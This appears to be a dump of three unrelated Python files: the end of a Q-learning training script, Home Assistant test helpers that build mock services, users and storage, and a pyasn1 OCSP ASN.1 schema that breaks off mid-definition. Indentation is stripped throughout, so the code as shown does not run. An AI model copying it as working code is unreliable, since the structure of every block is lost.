# Save the results to a file so we can graph it later.
with open('results/sonar-frames/learn_data-' + filename + '.csv', 'w') as data_dump:
wr = csv.writer(data_dump)
wr.writerows(data_collect)
with open('results/sonar-frames/loss_data-' + filename + '.csv', 'w') as lf:
wr = csv.writer(lf)
for loss_item in loss_log:
wr.writerow(loss_item)
def process_minibatch(minibatch, model):
"""This does the heavy lifting, aka, the training. It's super jacked."""
X_train = []
y_train = []
# Loop through our batch and create arrays for X and y
# so that we can fit our model at every step.
for memory in minibatch:
# Get stored values.
old_state_m, action_m, reward_m, new_state_m = memory
# Get prediction on old state.
old_qval = model.predict(old_state_m, batch_size=1)
# Get prediction on new state.
newQ = model.predict(new_state_m, batch_size=1)
# Get our best move. I think?
maxQ = np.max(newQ)
y = np.zeros((1, 3))
y[:] = old_qval[:]
# Check for terminal state.
if reward_m != -500: # non-terminal state
update = (reward_m + (GAMMA * maxQ))
else: # terminal state
update = reward_m
# Update the value for the action we took.
y[0][action_m] = update
X_train.append(old_state_m.reshape(NUM_INPUT,))
y_train.append(y.reshape(3,))
X_train = np.array(X_train)
y_train = np.array(y_train)
return X_train, y_train
def params_to_filename(params):
return str(params['nn'][0]) + '-' + str(params['nn'][1]) + '-' + \
str(params['batchSize']) + '-' + str(params['buffer'])
def launch_learn(params):
filename = params_to_filename(params)
print("Trying %s" % filename)
# Make sure we haven't run this one.
if not os.path.isfile('results/sonar-frames/loss_data-' + filename + '.csv'):
# Create file so we don't double test when we run multiple
# instances of the script at the same time.
open('results/sonar-frames/loss_data-' + filename + '.csv', 'a').close()
print("Starting test.")
# Train.
model = neural_net(NUM_INPUT, params['nn'])
train_net(model, params)
else:
print("Already tested.")
if __name__ == "__main__":
if TUNING:
param_list = []
nn_params = [[164, 150], [256, 256],
[512, 512], [1000, 1000]]
batchSizes = [40, 100, 400]
buffers = [10000, 50000]
for nn_param in nn_params:
for batchSize in batchSizes:
for buffer in buffers:
params = {
"batchSize": batchSize,
"buffer": buffer,
"nn": nn_param
}
param_list.append(params)
for param_set in param_list:
launch_learn(param_set)
else:
nn_param = [164, 150]
params = {
"batchSize": 100,
"buffer": 50000,
"nn": nn_param
}
model = neural_net(NUM_INPUT, nn_param)
train_net(model, params)
|
|
"""Test the helper method for writing tests."""
import asyncio
import functools as ft
import json
import logging
import os
import uuid
import sys
import threading
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
from io import StringIO
from unittest.mock import MagicMock, Mock, patch
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers,
permissions as auth_permissions)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, SERVER_PORT, STATE_ON, STATE_OFF)
from homeassistant.helpers import (
area_registry, device_registry, entity, entity_platform, entity_registry,
intent, restore_state, storage)
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.data['mqtt']._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': date_util.as_utc(time)})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
async def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().unsubscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = await async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
await hass.async_block_till_done()
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name='Mock Group',
policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {
'name': name,
'policy': policy,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False, groups=None):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
'groups': groups or [],
'perm_lookup': None,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(
policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
platform_schema_base=None, async_setup=None,
async_setup_entry=None, async_unload_entry=None,
async_migrate_entry=None, async_remove_entry=None,
partial_manifest=None):
"""Initialize the mock module."""
self.__name__ = 'homeassistant.components.{}'.format(domain)
self.__file__ = 'homeassistant/components/{}'.format(domain)
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {})
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = 'homeassistant.components.light.bla'
__file__ = 'homeassistant/components/blah/light'
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=1, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None, options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or uuid.uuid4().hex,
'domain': domain,
'data': data or {},
'options': options,
'version': version,
'title': title,
'connection_class': connection_class,
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(
hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
data.last_states = {
state.entity_id: restore_state.StoredState(state, now)
for state in states}
_LOGGER.debug('Restore cache: %s', data.last_states)
assert len(data.last_states) == len(states), \
"Duplicate entity_id? {}".format(states)
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle('device_info')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(
data_to_write, cls=store._encoder))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data['system_health']['info'][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, 'homeassisant.components.{}'.format(module.DOMAIN), None,
module.mock_manifest())
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(
loader.DATA_INTEGRATIONS, {}
)[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split('.')
integration_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if platform_name not in integration_cache:
mock_integration(hass, MockModule(platform_name))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache["{}.{}".format(platform_name, domain)] = module
|
|
#
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2005-2018, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pyasn1/license.html
#
# OCSP request/response syntax
#
# Derived from a minimal OCSP library (RFC2560) code written by
# Bud P. Bruegger <bud@ancitel.it>
# Copyright: Ancitel, S.p.a, Rome, Italy
# License: BSD
#
#
# current limitations:
# * request and response works only for a single certificate
# * only some values are parsed out of the response
# * the request does't set a nonce nor signature
# * there is no signature validation of the response
# * dates are left as strings in GeneralizedTime format -- datetime.datetime
# would be nicer
#
from pyasn1.type import namedtype
from pyasn1.type import namedval
from pyasn1.type import tag
from pyasn1.type import univ
from pyasn1.type import useful
from pyasn1_modules import rfc2459
# Start of OCSP module definitions
# This should be in directory Authentication Framework (X.509) module
class CRLReason(univ.Enumerated):
namedValues = namedval.NamedValues(
('unspecified', 0),
('keyCompromise', 1),
('cACompromise', 2),
('affiliationChanged', 3),
('superseded', 4),
('cessationOfOperation', 5),
('certificateHold', 6),
('removeFromCRL', 8),
('privilegeWithdrawn', 9),
('aACompromise', 10)
)
# end of directory Authentication Framework (X.509) module
# This should be in PKIX Certificate Extensions module
class GeneralName(univ.OctetString):
pass
# end of PKIX Certificate Extensions module
id_kp_OCSPSigning = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 3, 9))
id_pkix_ocsp = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1))
id_pkix_ocsp_basic = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 1))
id_pkix_ocsp_nonce = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 2))
id_pkix_ocsp_crl = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 3))
id_pkix_ocsp_response = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 4))
id_pkix_ocsp_nocheck = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 5))
id_pkix_ocsp_archive_cutoff = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 6))
id_pkix_ocsp_service_locator = univ.ObjectIdentifier((1, 3, 6, 1, 5, 5, 7, 48, 1, 7))
class AcceptableResponses(univ.SequenceOf):
componentType = univ.ObjectIdentifier()
class ArchiveCutoff(useful.GeneralizedTime):
pass
class UnknownInfo(univ.Null):
pass
class RevokedInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('revocationTime', useful.GeneralizedTime()),
namedtype.OptionalNamedType('revocationReason', CRLReason().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class CertID(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('hashAlgorithm', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('issuerNameHash', univ.OctetString()),
namedtype.NamedType('issuerKeyHash', univ.OctetString()),
namedtype.NamedType('serialNumber', rfc2459.CertificateSerialNumber())
)
class CertStatus(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('good',
univ.Null().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('revoked',
RevokedInfo().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('unknown',
UnknownInfo().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
)
class SingleResponse(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certID', CertID()),
namedtype.NamedType('certStatus', CertStatus()),
namedtype.NamedType('thisUpdate', useful.GeneralizedTime()),
namedtype.OptionalNamedType('nextUpdate', useful.GeneralizedTime().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('singleExtensions', rfc2459.Extensions().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class KeyHash(univ.OctetString):
pass
class ResponderID(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('byName',
rfc2459.Name().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('byKey',
KeyHash().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
)
class Version(univ.Integer):
namedValues = namedval.NamedValues(('v1', 0))
class ResponseData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.DefaultedNamedType('version', Version('v1').subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('responderID', ResponderID()),
namedtype.NamedType('producedAt', useful.GeneralizedTime()),
namedtype.NamedType('responses', univ.SequenceOf(componentType=SingleResponse())),
namedtype.OptionalNamedType('responseExtensions', rfc2459.Extensions().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class BasicOCSPResponse(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsResponseData', ResponseData()),
namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('signature', univ.BitString()),
namedtype.OptionalNamedType('certs', univ.SequenceOf(componentType=rfc2459.Certificate()).subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class ResponseBytes(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('responseType', univ.ObjectIdentifier()),
namedtype.NamedType('response', univ.OctetString())
)
class OCSPResponseStatus(univ.Enumerated):
namedValues = namedval.NamedValues(
('successful', 0),
('malformedRequest', 1),
('internalError', 2),
('tryLater', 3),
('undefinedStatus', 4), # should never occur
('sigRequired', 5),
('unauthorized', 6)
)
class OCSPResponse(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('responseStatus', OCSPResponseStatus()),
namedtype.OptionalNamedType('responseBytes', ResponseBytes().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class Request(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('reqCert', CertID()),
namedtype.OptionalNamedType('singleRequestExtensions', rfc2459.Extensions().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class Signature(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('signature', univ.BitString()),
namedtype.OptionalNamedType('certs', univ.SequenceOf(componentType=rfc2459.Certificate()).subtype(
